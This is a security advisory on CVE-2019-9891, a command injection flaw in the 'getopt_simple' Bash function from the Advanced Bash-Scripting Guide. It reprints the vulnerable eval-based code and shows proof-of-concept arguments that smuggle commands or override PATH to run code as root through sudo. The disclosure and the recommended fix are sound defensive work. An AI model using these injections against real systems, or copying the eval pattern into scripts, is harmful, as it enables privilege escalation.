Advisory: Code Execution via Insecure Shell Function getopt_simple
RedTeam Pentesting discovered that the shell function "getopt_simple",as presented in the "Advanced Bash-Scripting Guide", allows execution ofattacker-controlled commands.Details=======Product: Advanced Bash-Scripting GuideAffected Versions: allFixed Versions: -Vulnerability Type: Code ExecutionSecurity Risk: mediumVendor URL: Vendor Status: notifiedAdvisory URL: Advisory Status: privateCVE: CVE-2019-9891CVE URL: Introduction============The document "Advanced Bash-Scripting Guide" [1] is a tutorial forwriting shell scripts for Bash. It contains many example scriptstogether with in-depth explanations about how shell scripting works.More Details============During a penetration test, RedTeam Pentesting was able to executecommands as an unprivileged user (www-data) on a server. Among others,it was discovered that this user was permitted to run the shell script"cleanup.sh" as root via "sudo":------------------------------------------------------------------------$ sudo -lMatching Defaults entries for user on srv: env_reset, secure_path=/usr/sbin\:/usr/bin\:/sbin\:/binUser www-data may run the following commands on srv: (root) NOPASSWD: /usr/local/sbin/cleanup.sh------------------------------------------------------------------------The script "cleanup.sh" starts with the following code:------------------------------------------------------------------------#!/bin/bashgetopt_simple(){ until [ -z "$1" ] do if [ ${1:0:2} = '--' ] then tmp=${1:2} # Strip off leading '--' . . . parameter=${tmp%%=*} # Extract name. value=${tmp##*=} # Extract value. eval $parameter=$value fi shift done}target=/tmp# Pass all options to getopt_simple().getopt_simple $*# list files to cleanecho "listing files in $target"find "$target" -mtime 1------------------------------------------------------------------------The function "getopt_simple" is used to set variables based oncommand-line flags which are passed to the script. Calling the scriptwith the argument "--target=/tmp" sets the variable "$target" to thevalue "/tmp". The variable's value is then used in a call to "find". Thesource code of the "getopt_simple" function has been taken from the"Advanced Bash-Scripting Guide" [2]. It was also published as a book.RedTeam Pentesting identified two different ways to exploit thisfunction in order to run attacker-controlled commands as root.First, a flag can be specified in which either the name or the valuecontain a shell command. The call to "eval" will simply execute thiscommand.------------------------------------------------------------------------$ sudo /usr/local/sbin/cleanup.sh '--redteam=foo;id'uid=0(root) gid=0(root) groups=0(root)listing files in /tmp$ sudo /usr/local/sbin/cleanup.sh '--target=$(id)'listing files in uid=0(root) gid=0(root) groups=0(root)find: 'uid=0(root) gid=0(root) groups=0(root)': No such file or directory$ sudo /usr/local/sbin/cleanup.sh '--target=$(ls${IFS}/)'listing files in binbootdevetc[...]------------------------------------------------------------------------Instead of injecting shell commands, the script can also be exploited byoverwriting the "$PATH" variable:------------------------------------------------------------------------$ mkdir /tmp/redteam$ cat <<EOF > /tmp/redteam/find#!/bin/shecho "executed as root:"/usr/bin/idEOF$ chmod +x /tmp/redteam/find$ sudo /usr/local/sbin/cleanup.sh --PATH=/tmp/redteamlisting files in /tmpexecuted as root:uid=0(root) gid=0(root) groups=0(root)------------------------------------------------------------------------Workaround==========No workaround available.Fix===Replace the function "getopt_simple" with the built-in function"getopts" or the program "getopt" from the util-linux package.Examples on how to do so are included in the same tutorial [3][4].Security Risk=============If a script with attacker-controlled arguments uses the "getopt_simple"function, arbitrary commands may be invoked by the attackers. This isparticularly interesting if a privilege boundary is crossed, for examplein the context of "sudo". Overall, this vulnerability is rated as amedium risk.Timeline========2019-02-18 Vulnerability identified2019-03-20 Customer approved disclosure to vendor2019-03-20 Author notified2019-03-20 Author responded, document is not updated/maintained any more2019-03-20 CVE ID requested2019-03-21 CVE ID assigned2019-03-26 Advisory released References==========[1] [2] [3] [4] RedTeam Pentesting GmbH=======================RedTeam Pentesting offers individual penetration tests performed by ateam of specialised IT-security experts. Hereby, security weaknesses incompany networks or products are uncovered and can be fixed immediately.As there are only few experts in this field, RedTeam Pentesting wants toshare its knowledge and enhance the public knowledge with research insecurity-related areas. The results are made available as publicsecurity advisories.More information about RedTeam Pentesting can be found at: